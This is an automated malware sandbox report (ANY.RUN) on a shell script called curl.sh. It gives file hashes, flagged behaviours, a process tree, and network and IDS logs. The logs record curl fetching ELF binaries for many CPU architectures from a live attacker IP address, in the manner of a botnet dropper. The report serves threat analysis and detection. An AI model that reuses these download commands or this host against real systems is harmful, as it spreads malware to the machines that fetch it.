File name:

curl.sh

Full analysis: https://app.any.run/tasks/7abb46b2-cc6d-406a-91a1-ae38058f5ca7
Verdict: Malicious activity
Analysis date: May 16, 2025, 09:06:09
OS: Ubuntu 22.04.2
MIME: text/plain
File info: ASCII text, with CRLF line terminators
MD5:

2AC56999D9C4B240E2E37520978B064F

SHA1:

E722A50A1444630F0F89F3971839BBABF0378C34

SHA256:

DB98478657D6B9617DBD77AD9E75FFCCE94242A04726F2B29244A52D0763C419

SSDEEP:

12:3J3G/oBJG/iVG/6NIl5EG/H0LKmpGotnG/+72QGiMVSGc535GeLB/pGIzrJGDqGE:3J3AFiW6NI73SKgtAox51zpr5

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    No malicious indicators.

  • SUSPICIOUS

    • Modifies file or directory owner

      • sudo (PID: 41029)

    • Reads passwd file

      • dumpe2fs (PID: 41056)
      • dumpe2fs (PID: 41064)
      • curl (PID: 41035)
      • curl (PID: 41098)
      • curl (PID: 41126)
      • curl (PID: 41072)
      • curl (PID: 41205)
      • curl (PID: 41255)
      • curl (PID: 41280)
      • curl (PID: 41152)
      • curl (PID: 41179)
      • curl (PID: 41231)
      • curl (PID: 41308)
      • curl (PID: 41338)

    • Check the Environment Variables Related to System Identification (os-release)

      • curl (PID: 41035)
      • curl (PID: 41098)
      • curl (PID: 41072)
      • curl (PID: 41126)
      • curl (PID: 41231)
      • curl (PID: 41308)
      • curl (PID: 41255)
      • curl (PID: 41280)
      • curl (PID: 41338)
      • curl (PID: 41152)
      • curl (PID: 41179)
      • curl (PID: 41205)

    • Executes commands using command-line interpreter

      • sudo (PID: 41032)
      • bash (PID: 41033)

    • Potential Corporate Privacy Violation

      • curl (PID: 41072)
      • curl (PID: 41152)
      • curl (PID: 41205)
      • curl (PID: 41280)
      • curl (PID: 41035)
      • curl (PID: 41126)
      • curl (PID: 41098)
      • curl (PID: 41231)

    • Executes the "rm" command to delete files or directories

      • bash (PID: 41033)

  • INFO

    • Checks timezone

      • dumpe2fs (PID: 41064)
      • dumpe2fs (PID: 41056)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
215
Monitored processes
83
Malicious processes
2
Suspicious processes
9

Behavior graph

Click at the process to see the details
dash no specs sudo no specs chown no specs chmod no specs sudo no specs bash no specs locale-check no specs curl snap-seccomp no specs snap-confine no specs dumpe2fs no specs snap-update-ns no specs dumpe2fs no specs chmod no specs bash no specs curl snap-seccomp no specs snap-confine no specs snap-confine no specs chmod no specs bash no specs curl snap-seccomp no specs snap-confine no specs snap-confine no specs chmod no specs bash no specs curl snap-seccomp no specs snap-confine no specs snap-confine no specs chmod no specs bash no specs curl snap-seccomp no specs snap-confine no specs snap-confine no specs chmod no specs bash no specs curl snap-seccomp no specs snap-confine no specs snap-confine no specs chmod no specs bash no specs curl snap-seccomp no specs snap-confine no specs snap-confine no specs chmod no specs bash no specs curl snap-seccomp no specs snap-confine no specs snap-confine no specs chmod no specs bash no specs curl snap-seccomp no specs snap-confine no specs snap-confine no specs chmod no specs bash no specs curl snap-seccomp no specs snap-confine no specs snap-confine no specs chmod no specs bash no specs curl snap-seccomp no specs snap-confine no specs snap-confine no specs chmod no specs bash no specs curl snap-seccomp no specs snap-confine no specs snap-confine no specs chmod no specs bash no specs bash no specs rm no specs

Process information

PID
CMD
Path
Indicators
Parent process
41028/bin/sh -c "sudo chown user /tmp/curl\.sh && chmod +x /tmp/curl\.sh && DISPLAY=:0 sudo -iu user /tmp/curl\.sh "/usr/bin/dashIntiFjKCklFyPMJr
User:
root
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libc.so.6
41029sudo chown user /tmp/curl.sh/usr/bin/sudodash
User:
root
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libaudit.so.1.0.0
/usr/lib/x86_64-linux-gnu/libselinux.so.1
/usr/libexec/sudo/libsudo_util.so.0.0.0
/usr/lib/x86_64-linux-gnu/libc.so.6
/usr/lib/x86_64-linux-gnu/libcap-ng.so.0.0.0
/usr/lib/x86_64-linux-gnu/libpcre2-8.so.0.10.4
/usr/lib/x86_64-linux-gnu/libnss_systemd.so.2
/usr/libexec/sudo/sudoers.so
/usr/lib/x86_64-linux-gnu/libpam.so.0.85.1
/usr/lib/x86_64-linux-gnu/libz.so.1.2.11
41030chown user /tmp/curl.sh/usr/bin/chownsudo
User:
root
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libc.so.6
41031chmod +x /tmp/curl.sh/usr/bin/chmoddash
User:
root
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libc.so.6
41032sudo -iu user /tmp/curl.sh/usr/bin/sudodash
User:
root
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libaudit.so.1.0.0
/usr/lib/x86_64-linux-gnu/libselinux.so.1
/usr/libexec/sudo/libsudo_util.so.0.0.0
/usr/lib/x86_64-linux-gnu/libc.so.6
/usr/lib/x86_64-linux-gnu/libcap-ng.so.0.0.0
/usr/lib/x86_64-linux-gnu/libpcre2-8.so.0.10.4
/usr/lib/x86_64-linux-gnu/libnss_systemd.so.2
/usr/libexec/sudo/sudoers.so
/usr/lib/x86_64-linux-gnu/libpam.so.0.85.1
/usr/lib/x86_64-linux-gnu/libz.so.1.2.11
41033-bash --login -c \/tmp\/curl\.sh/usr/bin/bashsudo
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libtinfo.so.6.3
/usr/lib/x86_64-linux-gnu/libc.so.6
41034/usr/bin/locale-check C.UTF-8/usr/bin/locale-checkbash
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libc.so.6
41035/snap/curl/1754/bin/curl http://37.114.63.141/arm/snap/curl/1754/bin/curl
bash
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libc.so.6
/usr/lib/x86_64-linux-gnu/libpthread.so.0
/usr/lib/x86_64-linux-gnu/libudev.so.1.7.2
/usr/lib/x86_64-linux-gnu/libdl.so.2
/usr/lib/x86_64-linux-gnu/libc-2.31.so
/snap/curl/1754/lib/libcurl.so.4.8.0
/usr/lib/x86_64-linux-gnu/libz.so.1.2.11
/usr/lib/x86_64-linux-gnu/libpthread-2.31.so
/snap/curl/1754/usr/lib/x86_64-linux-gnu/libnghttp2.so.14.19.0
/snap/curl/1754/usr/lib/x86_64-linux-gnu/libidn2.so.0.3.6
41047/snap/snapd/20290/usr/lib/snapd/snap-seccomp version-info/snap/snapd/20290/usr/lib/snapd/snap-seccompcurl
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libpthread.so.0
/usr/lib/x86_64-linux-gnu/libc.so.6
41055/snap/snapd/20290/usr/lib/snapd/snap-confine --base core20 snap.curl.curl /usr/lib/snapd/snap-exec curl http://37.114.63.141/arm/snap/snapd/20290/usr/lib/snapd/snap-confinecurl
User:
root
Integrity Level:
UNKNOWN
Exit code:
0
Executable files
0
Suspicious files
0
Text files
0
Unknown types
0

Dropped files

No data
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
14
TCP/UDP connections
21
DNS requests
12
Threats
20

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
GET
204
91.189.91.96:80
http://connectivity-check.ubuntu.com/
unknown
whitelisted
GET
204
91.189.91.96:80
http://connectivity-check.ubuntu.com/
unknown
whitelisted
41072
curl
GET
200
37.114.63.141:80
http://37.114.63.141/arm5
unknown
unknown
41035
curl
GET
200
37.114.63.141:80
http://37.114.63.141/arm
unknown
unknown
41152
curl
GET
200
37.114.63.141:80
http://37.114.63.141/sh4
unknown
unknown
41179
curl
GET
404
37.114.63.141:80
http://37.114.63.141/arc
unknown
unknown
41205
curl
GET
200
37.114.63.141:80
http://37.114.63.141/mips
unknown
unknown
41231
curl
GET
200
37.114.63.141:80
http://37.114.63.141/mpsl
unknown
unknown
41280
curl
GET
200
37.114.63.141:80
http://37.114.63.141/x86
unknown
unknown
41308
curl
GET
404
37.114.63.141:80
http://37.114.63.141/i686
unknown
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
91.189.91.96:80
connectivity-check.ubuntu.com
Canonical Group Limited
US
whitelisted
484
avahi-daemon
224.0.0.251:5353
unknown
37.19.194.81:443
odrs.gnome.org
Datacamp Limited
DE
whitelisted
185.125.188.59:443
api.snapcraft.io
Canonical Group Limited
GB
unknown
512
snapd
185.125.188.54:443
api.snapcraft.io
Canonical Group Limited
GB
whitelisted
512
snapd
185.125.188.59:443
api.snapcraft.io
Canonical Group Limited
GB
whitelisted
41035
curl
37.114.63.141:80
intercolo GmbH
DE
unknown
41072
curl
37.114.63.141:80
intercolo GmbH
DE
unknown
41098
curl
37.114.63.141:80
intercolo GmbH
DE
unknown
41126
curl
37.114.63.141:80
intercolo GmbH
DE
unknown

DNS requests

Domain
IP
Reputation
connectivity-check.ubuntu.com
  • 91.189.91.96
  • 185.125.190.48
  • 185.125.190.17
  • 185.125.190.18
  • 185.125.190.49
  • 91.189.91.98
  • 91.189.91.49
  • 185.125.190.97
  • 185.125.190.98
  • 185.125.190.96
  • 91.189.91.48
  • 2620:2d:4000:1::2a
  • 2620:2d:4002:1::196
  • 2620:2d:4002:1::198
  • 2001:67c:1562::24
  • 2620:2d:4000:1::98
  • 2620:2d:4000:1::2b
  • 2001:67c:1562::23
  • 2620:2d:4000:1::22
  • 2620:2d:4000:1::96
  • 2620:2d:4000:1::97
  • 2620:2d:4000:1::23
whitelisted
google.com
  • 142.250.186.142
  • 2a00:1450:4001:82a::200e
whitelisted
odrs.gnome.org
  • 37.19.194.81
  • 169.150.255.183
  • 169.150.255.180
  • 195.181.170.18
  • 207.211.211.27
  • 212.102.56.178
  • 195.181.175.40
  • 2a02:6ea0:c700::112
  • 2a02:6ea0:c700::19
  • 2a02:6ea0:c700::21
  • 2a02:6ea0:c700::11
  • 2a02:6ea0:c700::18
  • 2a02:6ea0:c700::107
  • 2a02:6ea0:c700::101
whitelisted
api.snapcraft.io
  • 185.125.188.59
  • 185.125.188.57
  • 185.125.188.54
  • 185.125.188.58
  • 2620:2d:4000:1010::42
  • 2620:2d:4000:1010::344
  • 2620:2d:4000:1010::117
  • 2620:2d:4000:1010::2e6
whitelisted
3.100.168.192.in-addr.arpa
unknown

Threats

PID
Process
Class
Message
41035
curl
Potentially Bad Traffic
ET HUNTING curl User-Agent to Dotted Quad
41035
curl
Potential Corporate Privacy Violation
ET INFO Executable and linking format (ELF) file download Over HTTP
41072
curl
Potentially Bad Traffic
ET HUNTING curl User-Agent to Dotted Quad
41126
curl
Potentially Bad Traffic
ET HUNTING curl User-Agent to Dotted Quad
41126
curl
Potential Corporate Privacy Violation
ET INFO Executable and linking format (ELF) file download Over HTTP
41098
curl
Potential Corporate Privacy Violation
ET INFO Executable and linking format (ELF) file download Over HTTP
41098
curl
Potentially Bad Traffic
ET HUNTING curl User-Agent to Dotted Quad
41072
curl
Potential Corporate Privacy Violation
ET INFO Executable and linking format (ELF) file download Over HTTP
41179
curl
Potentially Bad Traffic
ET HUNTING curl User-Agent to Dotted Quad
41205
curl
Potentially Bad Traffic
ET HUNTING curl User-Agent to Dotted Quad
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
curl.sh